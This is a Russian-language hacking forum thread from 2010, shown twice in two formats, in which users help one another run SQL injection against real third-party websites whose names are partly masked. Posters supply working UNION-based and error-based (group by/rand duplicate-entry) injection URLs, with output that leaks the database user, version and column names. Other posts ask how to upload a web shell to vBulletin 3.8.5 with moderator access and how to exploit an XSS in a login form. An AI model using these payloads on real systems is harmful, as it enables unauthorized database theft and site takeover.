Вопросы по уязвимостям - Страница 10

Fepsis · 18.07.2010, 16:39

Багаж знаний по SQL-Injection не велик (пара статей) поэтому просьба - сильно не пинать..)

В общем определял количество полей через union+select+1,2... Скрипт убежал за значение 1000 так и не определив сколько в таблице полей... Попробовал альтернативные методы, и действительно "order by" и "group by" показали, что в таблице 4 поля...

Собственно сабж - как вывести из базы инфу, если union+select+1,2,3,4+--+ упорно твердит "The used SELECT statements have a different number of columns"

Код:

http://www.***.com/article.php?id=-1245+union+select+1,2,3,4+--+

К ответу желательно приложить урлы на соответствующие статьи..)

Ded MustD!e · 18.07.2010, 16:51

Цитата:

Сообщение от Fepsis

Багаж знаний по SQL-Injection не велик (пара статей) поэтому просьба - сильно не пинать..)

В общем определял количество полей через union+select+1,2... Скрипт убежал за значение 1000 так и не определив сколько в таблице полей... Попробовал альтернативные методы, и действительно "order by" и "group by" показали, что в таблице 4 поля...

Собственно сабж - как вывести из базы инфу, если union+select+1,2,3,4+--+ упорно твердит "The used SELECT statements have a different number of columns"

Код:

http://www.***.com/article.php?id=-1245+union+select+1,2,3,4+--+

К ответу желательно приложить урлы на соответствующие статьи..)

когда присутствует вывод ошибок, можно выводить информацию через них:

Код:

http://www.***.com/article.php?id=1245+or+%28select%20count%28*%29+from+%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28mid%28%28select%20concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%20from%20information_schema.columns%20limit%200,1%29,1,64%29,floor%28rand%280%29*2%29%29%29--

Duplicate entry 'outyourb_outyour@localhost:5.1.47-community-logutyourb_oyb1' for key 'group_key'

Почитать об этом можно тут:

https://rdot.org/forum/showthread.php?t=245

Jokester · 18.07.2010, 17:07

Дело в том, что в скрипте минимум 3 запроса. Тоесть параметр попадает в 3 запроса к базе

1 в котором 4 поля видимо не имеет вывода (хотя я не особо смотрел)

2 мы увидим если продолжим подбирать order by
order by 22
order by 23
посмотри, они разные, и в итоге вывод:

http://www.***.com/article.php?id=-1245+UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22--+

3 Ну и третий в баннере наверху, вывод в свойствах картинки увидишь

http://www.***.com/article.php?id=-1245+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,0x2D3120756E696F6E2073656C65637420312C322C332C342 C352C362C372C382C76657273696F6E28292C31302C31312D2 D2B,22--+

refresh · 19.07.2010, 13:53

Может посчитаете офтопом, но думаю именно тут надо задать этот вопрос. Только начал разбираться в SQL inj. Хотел спросить совета по поводу тренировки: стоит ли использовать для этого проекты типа WEBGoa или Damn Vulnerable Web App? или лучше брать какую-нибудь старую и бажную версию движка и ковырять ее? И если у вас есть какие-нибудь дырявые скрипты буду только рад.

nobody · 19.07.2010, 14:29

тебе сюда
насчет Damn Vulnerable Web App - да, довольно маленький но хорош для обучения
прелесть заключается в том что есть разные уровни сложности, и в зависимости от каждого, на любом левеле (xss/sql-inj/php-inj/csrf/etc) можно посмотреть сорцы этой уязвимой страницы со ответственно надо думать над кодом, а не тупо вставлять ковычки

Dare · 20.07.2010, 14:32

Имеем:

Код:

http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat%28version%28%29,rand%280%29|0%29+having+avg%280%29--+

С дальнейшим выводом затрудняюсь, подскажите в чем трабла?

Код:

http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat%28%28select+column_name+from+information_schema.columns+limit+0,1%29,rand%280%29|0%29+having+avg%280%29--+

Зарание благодарен.

DrakonHaSh · 20.07.2010, 15:14

строку select-ом у меня получить не удалось, зато можно циферки:

Код:

http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat((select+length(column_name)+from+information_schema.columns+limit+0,1),rand(0)|0)+having+avg(0)--+

=>
MySQL Error: 1062 (Duplicate entry '181' for key 1)
=> длина = 18

Код:

http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat((select+ascii(mid(column_name,1,1))+from+information_schema.columns+limit+0,1),rand(0)|0)+having+avg(0)--+

=>
MySQL Error: 1062 (Duplicate entry '671' for key 1)
=>
первый символ = 67 = 'C'

Jokester · 20.07.2010, 15:18

http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat(mid ((select+column_name+from+information_schema.colum ns+limit+1,1),1,64),rand(0)|0)+having+avg(0)--+
либо
http://***.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat(mid ((select+group_concat(column_name)+from+informatio n_schema.columns),1,64),rand(0)|0)+having+avg(0)--+

Думаю дальнейшее понятно, раз уж вы конструируете такие запросы

DrakonHaSh
Ну можно и так , конечно

Keltos · 21.07.2010, 08:37

Подскажите как залить шелл на vBulletin 3.8.5.
Есть доступ к Панели модератора

life_glider · 22.07.2010, 23:02

копаю движок:

PHP код:


			
    echo "

        <form method=post>

            <input type=hidden name=goto value='".$_SERVER['REQUEST_URI']."'>

            <p>Enter password: <input type=password name=password></p>

            <p><input type=submit value='Login'></p>

        </form>

    ";

можно ли провести пассивную-xss атаку? как и в каких браузерах?

18.07.2010, 16:39	#91
Fepsis Регистрация: 05.07.2010 Сообщений: 55 Репутация: 9	Багаж знаний по SQL-Injection не велик (пара статей) поэтому просьба - сильно не пинать..) В общем определял количество полей через union+select+1,2... Скрипт убежал за значение 1000 так и не определив сколько в таблице полей... Попробовал альтернативные методы, и действительно "order by" и "group by" показали, что в таблице 4 поля... Собственно сабж - как вывести из базы инфу, если union+select+1,2,3,4+--+ упорно твердит "The used SELECT statements have a different number of columns" Код: http://www.**.com/article.php?id=-1245+union+select+1,2,3,4+--+ К ответу желательно приложить урлы на соответствующие статьи..) Последний раз редактировалось Twost; 14.05.2013 в 12:56..*

18.07.2010, 17:07	#93
Jokester Регистрация: 01.07.2010 Сообщений: 250 Репутация: 155	Дело в том, что в скрипте минимум 3 запроса. Тоесть параметр попадает в 3 запроса к базе 1 в котором 4 поля видимо не имеет вывода (хотя я не особо смотрел) 2 мы увидим если продолжим подбирать order by order by 22 order by 23 посмотри, они разные, и в итоге вывод: http://www.*.com/article.php?id=-1245+UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22--+ 3 Ну и третий в баннере наверху, вывод в свойствах картинки увидишь http://www..com/article.php?id=-1245+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,0x2D3120756E696F6E2073656C65637420312C322C332C342 C352C362C372C382C76657273696F6E28292C31302C31312D2 D2B,22--+ Последний раз редактировалось Twost; 14.05.2013 в 12:57..*

20.07.2010, 14:32	#96
Dare Регистрация: 05.07.2010 Сообщений: 21 Репутация: 2	Имеем: Код: http://*.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat%28version%28%29,rand%280%29\|0%29+having+avg%280%29--+ С дальнейшим выводом затрудняюсь, подскажите в чем трабла? Код: http://.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat%28%28select+column_name+from+information_schema.columns+limit+0,1%29,rand%280%29\|0%29+having+avg%280%29--+ Зарание благодарен. __________________ Продаю воздух* Последний раз редактировалось Twost; 14.05.2013 в 12:58..

20.07.2010, 15:14	#97
DrakonHaSh Регистрация: 05.07.2010 Сообщений: 244 Репутация: 106	строку select-ом у меня получить не удалось, зато можно циферки: Код: http://*.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat((select+length(column_name)+from+information_schema.columns+limit+0,1),rand(0)\|0)+having+avg(0)--+ => MySQL Error: 1062 (Duplicate entry '181' for key 1) => длина = 18 Код: http://.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat((select+ascii(mid(column_name,1,1))+from+information_schema.columns+limit+0,1),rand(0)\|0)+having+avg(0)--+ => MySQL Error: 1062 (Duplicate entry '671' for key 1) => первый символ = 67 = 'C' Последний раз редактировалось Twost; 14.05.2013 в 12:58..*

20.07.2010, 15:18	#98
Jokester Регистрация: 01.07.2010 Сообщений: 250 Репутация: 155	http://*.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat(mid ((select+column_name+from+information_schema.colum ns+limit+1,1),1,64),rand(0)\|0)+having+avg(0)--+ либо http://.co.uk/feature.php?id=98&fid=485+or+1+group+by+concat(mid ((select+group_concat(column_name)+from+informatio n_schema.columns),1,64),rand(0)\|0)+having+avg(0)--+ Думаю дальнейшее понятно, раз уж вы конструируете такие запросы DrakonHaSh* Ну можно и так , конечно Последний раз редактировалось Twost; 14.05.2013 в 12:58..

19.07.2010, 13:53	#94
refresh Регистрация: 18.07.2010 Сообщений: 9 Репутация: 0	Может посчитаете офтопом, но думаю именно тут надо задать этот вопрос. Только начал разбираться в SQL inj. Хотел спросить совета по поводу тренировки: стоит ли использовать для этого проекты типа WEBGoa или Damn Vulnerable Web App? или лучше брать какую-нибудь старую и бажную версию движка и ковырять ее? И если у вас есть какие-нибудь дырявые скрипты буду только рад.

19.07.2010, 14:29	#95
nobody Регистрация: 05.07.2010 Сообщений: 176 Репутация: 130	тебе сюда насчет Damn Vulnerable Web App - да, довольно маленький но хорош для обучения прелесть заключается в том что есть разные уровни сложности, и в зависимости от каждого, на любом левеле (xss/sql-inj/php-inj/csrf/etc) можно посмотреть сорцы этой уязвимой страницы со ответственно надо думать над кодом, а не тупо вставлять ковычки

21.07.2010, 08:37	#99
Keltos Регистрация: 05.07.2010 Сообщений: 17 Репутация: 3	Подскажите как залить шелл на vBulletin 3.8.5. Есть доступ к Панели модератора

22.07.2010, 23:02	#100
life_glider Регистрация: 06.07.2010 Сообщений: 43 Репутация: 17	копаю движок: PHP код: `echo " <form method=post> <input type=hidden name=goto value='".$_SERVER['REQUEST_URI']."'> <p>Enter password: <input type=password name=password></p> <p><input type=submit value='Login'></p> </form> ";` можно ли провести пассивную-xss атаку? как и в каких браузерах? __________________ Вы все такие классные

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид